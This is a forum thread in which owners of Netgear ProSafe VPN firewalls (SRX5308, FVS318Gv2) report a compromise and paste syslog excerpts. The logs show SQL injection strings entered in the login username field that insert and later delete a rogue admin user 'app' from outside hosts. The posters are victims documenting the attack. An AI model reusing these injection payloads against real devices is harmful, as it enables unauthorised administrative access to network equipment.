Orbi WiFi 7 RBE973
Reply

Successful hack of our SRX5308

laxamar
Aspirant

Successful hack of our SRX5308

Hi,

Our SRX5308 was successfully hackedon Sep 27th. They seem to have found a SQL password that keeps users in a an internal database and injected a new user 'app'. We had SYSLOG to another machine ,so we caught the successful attempt and steps:

I don't know how to prevent this attack later, as they seem to have a direct way to inject with a known DB password

 

Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:34 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:37 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:43 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:46 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:47 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:19:51 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:53 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:55 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:19:58 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:19:59 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'
Sep 27 16:20:03 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:04 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:08 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:11 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:12 SRX5308 LOGIN [System] SSL_INFO : Login Successful for geardomain user app(Admin) from host 45.77.35.64
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:13 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';INSERT INTO USERDBUsers(UserName,FirstName,LastName,GroupName,UserType,UserTimeOut,groupid,DenyLogin,DenyLoginFromWan,LoginFromIP,LoginFromBrowser,Password,DefaultUser,LockoutEnable,MaxLockoutAttempts,LockPeri
Sep 27 16:20:30 SRX5308 LOGIN [System] SSL_INFO :user app is Logged-Out successfully from host 45.77.35.64
Sep 27 16:20:31 SRX5308 LOGIN [System] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

 

Model: SRX5308|PROSAFE Gigabit Quad WAN SSL & IPSEC VPN Firewall
Message 1 of 5
laxamar
Aspirant

Re: Successful hack of our SRX5308

It seems like a very old school DB injection during log in. Seems that Netgear does not db_escape their user input. Gawd!

Message 2 of 5
jec956613
Tutor

Re: Successful hack of our SRX5308

These have been out of support for a little while now.  Sadly, Netgear hasnt' seen fit to really replace them properly yet, so some vulnerability was bound to crop up eventually.

Message 3 of 5
tetrawest
Apprentice

Re: Successful hack of our SRX5308

This is the reason I upgraded my perfectly working Prosafe FVS336Gv3 VPN routers to the BR500, end of support and firmware upgrades. Sadly, the BR500 is not reliable. 

Message 4 of 5
Ricque
Tutor

Re: Successful hack of our SRX5308

Same exploit on my FVS318Gv2 running firmware 4.3.5-3. Same user "app" added via SQL insertion on the login/password form. Not clear if anything was taken. 

 

[FVS318Gv2]Wed Nov 20 06:51:56 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Administrator app is successfully added. Group: geardomain User TimeOut: 5

[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:51:58 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO : Login Successful for geardomain user app(Admin) from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:14 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_INFO :user app is Logged-Out successfully from host 139.180.209.90

[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

[FVS318Gv2]Wed Nov 20 06:52:15 2019(GMT-0700) [FVS318Gv2][System][LOGIN] SSL_ERROR: Invalid Password for user myxxxx';delete from USERDBUsers where UserName='app';'

[FVS318Gv2]Wed Nov 20 06:52:17 2019(GMT-0700) [FVS318Gv2][SSLVPN][SSLVPN] Deleted User app

Model: FVS318Gv2|ProSafe gigabit 8 port VPN firewall
Message 5 of 5
Discussion stats
  • 4 replies
  • 8933 views
  • 0 kudos
  • 4 in conversation
Announcements